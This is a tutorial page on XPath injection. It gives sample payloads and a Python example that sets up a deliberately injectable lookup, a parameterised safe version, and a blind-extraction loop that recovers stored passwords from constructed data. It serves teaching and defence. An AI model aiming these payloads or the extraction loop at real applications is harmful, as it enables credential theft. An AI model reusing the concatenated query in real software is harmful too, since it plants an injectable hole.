
XML / XPath

Concept

Data is stored in an XML file:

<group>
    <element>
        <attribute1>...</attribute1>
        <attribute2>...</attribute2>
        <attribute3>...</attribute3>
    </element>
    <element>
        ...
    </element>
    <element>
        ...
    </element>
</group>

And queries against it are written as XPath expressions like this:

/group/element[1]/attribute1

You can detect the injection by sending a payload that changes the logic of the query (see the examples below).

Once the injection is confirmed, you can run blind tests with XPath functions such as:

contains([string],[substring])
name([path])
substring([string],start,length)
string-length([string])

Note that the third argument of substring() is a length, not an end position: substring(x,1,1) is the first character, substring(x,2,3) the second to fourth.

A node's text value is selected by its path, and name() returns the name of an element. If you don't know the name of an element, use * as a wildcard step (it matches any element at that position, for example /*[1] is the root element); it is a wildcard, not a regex.

Examples of payloads

test if the query is injectable (true() always matches)

invalid' or true()

test if the first character of the root element's content is 'a'

invalid' or substring(/*[1],1,1)='a'

test if there's content

invalid' or string-length(/group/element[2]/attribute1)>=1

These payloads assume nothing follows the injected value in the query. If the application closes the quote after your input, end the payload with a comparison that consumes that quote, for example invalid' or true() or 'x'=' (which becomes ... or 'x'='' once the closing quote is appended; an unbalanced quote is an XPath syntax error, not a match).
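To see the whole chain working offline, here is an added Python example (not code from the original page) that models a lookup endpoint built over the page's <group>/<element> layout: the concatenated query that is injectable, the same query written with an XPath variable so the input is never parsed as XPath, and a blind-extraction loop that generalises the string-length()/substring() payloads above to recover any string the oracle can be asked about, including element names via name(). The sample document, the meaning given to attribute1/attribute2 (username/password), and the function names are constructed for this example; it needs lxml.

```python
# Added example for this page (not the page's own code). Requires lxml.
from lxml import etree

# Constructed sample document in the page's <group>/<element> layout.
# Assumption for the example: attribute1 = username, attribute2 = password,
# attribute3 = role.
XML_DOC = b"""<group>
    <element>
        <attribute1>alice</attribute1>
        <attribute2>s3cret</attribute2>
        <attribute3>admin</attribute3>
    </element>
    <element>
        <attribute1>bob</attribute1>
        <attribute2>hunter2</attribute2>
        <attribute3>user</attribute3>
    </element>
</group>"""

TREE = etree.fromstring(XML_DOC)


def lookup_vulnerable(username: str) -> bool:
    """Boolean oracle built by string concatenation: the injectable pattern.

    The application closes the quote after the input, so a payload has to
    leave the expression balanced. An XPath syntax error is treated as
    "not found", as many applications do (they would show an error page).
    """
    query = "/group/element[attribute1='" + username + "']"
    try:
        return len(TREE.xpath(query)) > 0
    except etree.XPathEvalError:
        return False


def lookup_safe(username: str) -> bool:
    """Same lookup with an XPath variable; the input is data, never XPath."""
    return len(TREE.xpath("/group/element[attribute1=$u]", u=username)) > 0


def blind_extract(oracle, target: str, max_len: int = 32) -> str:
    """Recover the string value of the XPath expression `target` using only
    the yes/no answers of `oracle`: string-length() to find the length,
    then substring() one character at a time.

    The trailing  or 'x'='  swallows the quote the application appends, so
    the predicate becomes  attribute1='invalid' or <test> or 'x'=''  and the
    answer depends only on <test>.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    length = 0
    for n in range(1, max_len + 1):
        if oracle("invalid' or string-length(%s)=%d or 'x'='" % (target, n)):
            length = n
            break
    recovered = []
    for pos in range(1, length + 1):
        for c in alphabet:
            if oracle("invalid' or substring(%s,%d,1)='%s' or 'x'='" % (target, pos, c)):
                recovered.append(c)
                break
        else:
            recovered.append("?")  # character outside our alphabet
    return "".join(recovered)


if __name__ == "__main__":
    print(lookup_vulnerable("invalid' or true() or 'x'='"))  # True: bypassed
    print(lookup_vulnerable("invalid' or true()"))           # False: unbalanced quote
    print(lookup_safe("invalid' or true() or 'x'='"))        # False: treated as a plain name
    print(blind_extract(lookup_vulnerable, "/group/element[2]/attribute1"))  # bob
    print(blind_extract(lookup_vulnerable, "/group/element[1]/attribute2"))  # s3cret
    print(blind_extract(lookup_vulnerable, "name(/*[1])"))   # group
```

Against lookup_safe the same extraction loop returns an empty string, because the payload is compared as a literal username and never changes the query; that is the whole difference between the two functions.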

Resources

Payloads